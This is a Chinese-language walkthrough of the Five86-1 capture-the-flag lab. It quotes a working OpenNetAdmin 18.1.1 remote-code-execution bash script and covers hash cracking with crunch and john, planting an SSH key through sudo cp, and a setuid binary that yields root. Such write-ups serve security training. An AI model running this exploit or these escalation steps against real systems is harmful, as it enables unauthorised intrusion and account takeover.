本文已参与「新人创作礼」活动,一起开启掘金创作之路。
Description
Five86-1 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
DC and Five86 Series Challenges
先找到靶机地址
nmap -sP 192.168.37.1/24
nmap -p 1-65535 -A 192.168.37.147
开了三个端口,都为 open 先看看 80
HINT: A dictionary attack will probably fail. I recommend using hashcat, a bruteforce attack, and a character set of aethrt for this 8 letter password.If you follow the above hint, it shouldn't take you all that long. Good luck.:-)
端口为 10000 的页面
扫描目录后可以看到几个可以访问的目录
在 robots 文件中提示的是 ona 目录
/robots.txt
访问 ona , 暂时没有可用的点
可以看到使用的是 Open Net Admin 框架
opennetadmin
msf 中 searchsploit opennetadmin
cp /usr/share/exploitdb/exploits/php/webapps/47691.sh shell.sh
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
直接跑脚本
bash shell.sh http://192.168.37.147/ona/
脚本 CMD 无法进行一些报错回显
下一步进行信息收集
先看 www-data 可使用的文件有什么
$ find / -type f -user www-data
往后的 /proc 的都没用,log 文件也没用,查看 .htaccess 文件
$ cat /var/www/html/reports/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/.htpasswd
require valid-user
/var/www/.htpasswd 文件需要有效用户才能进行查看的一个限制文件
访问
$ cat /var/www/.htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
得到一个用户和哈希密码,和密码提示
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
首先使用 crunch 创建一个明文密码字典
crunch 10 10 aefhrt > five86-1_password.txt
把 douglas 的哈希密码单独放一个文件
$ cat five86-1_hashpasswd.txt
进行碰撞
john --wordlist=five86-1_password.txt five86-1_hashpasswd.txt
爆出密码
22 端口前面看是 open
先看权限
可以看到 (jen) NOPASSWD: /bin/cp
寻找可以利用的东西,在 ~ 目录下有 .ssh 目录,里面有 douglas 的公钥和私钥登录文件
在之前我们可以执行 jen 的 cp 命令
将公钥文件复制进 jen 中
.ssh/authorized_keys 是免密登录的文件,将公钥内容复制进文件中即可实现免密登录
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
复制成功,直接执行登录命令
ssh jen@192.168.37.147
有新邮件,可能有东西,mail 一般在 /var/spool/mail
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
(envelope-from <roy@five86-1>)
id 1imZBc-0001FU-El
for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500
Hi Jen,
As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
Moss will understand (ha ha ha ha).
Tanks,
Roy
moss 的密码是 Fire!Fire!
moss@five86-1:~$ ls
moss@five86-1:~$ ls -a
. .. .bash_history .games
moss@five86-1:~$
可以看到当前目录有一个隐藏目录和一个没用的隐藏文件
moss@five86-1:~/.games$ ls -la
total 28
drwx------ 2 moss moss 4096 Jan 1 2020 .
drwx------ 3 moss moss 4096 Jan 1 2020 ..
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss 14 Jan 1 2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss 15 Jan 1 2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss 25 Jan 1 2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 16824 Jan 1 2020 upyourgame
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 worms -> /usr/games/worms
moss@five86-1:~/.games$
可以看到有一个 root 权限的文件
运行后
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? yes
Could you please repeat that? no
Nope, you'll need to enter that again. no
You entered: No. Is this correct? no
We appear to have a problem? Do we have a problem? no
Made in Britain.
# whoami
root
# cd /
# ls
bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old webmin-setup.out
# cd root
# ls
flag.txt
# cat flag.txt
8f3b38dd95eccf600593da4522251746
#
拿到 flag
